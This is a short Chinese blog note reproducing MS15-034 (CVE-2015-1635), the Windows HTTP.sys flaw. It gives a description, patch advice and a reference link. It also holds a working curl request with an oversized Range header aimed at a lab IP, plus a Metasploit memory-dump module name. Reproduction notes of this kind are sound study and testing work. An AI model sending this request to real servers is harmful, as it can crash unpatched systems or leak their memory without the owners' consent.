MS15-034漏洞复现、HTTP.SYS远程代码执行漏洞

#每次命令都百度去找命令,直接弄到博客方便些;

漏洞描述:

  在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

修复建议:

  微软已发布补丁MS15-034,补丁下载地址:https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx 注:建议在修复前创建服务器快照,以免修复失败造成损失。

Referee:https://www.cnblogs.com/peterpan0707007/p/8529261.html

复现过程:

curl http://192.168.40.65 -H "Host: 192.168.40.65" -H "Range: bytes=0-18446744073709551615"

 

MSF模块

scanner/http/ms15_034_http_sys_memory_dump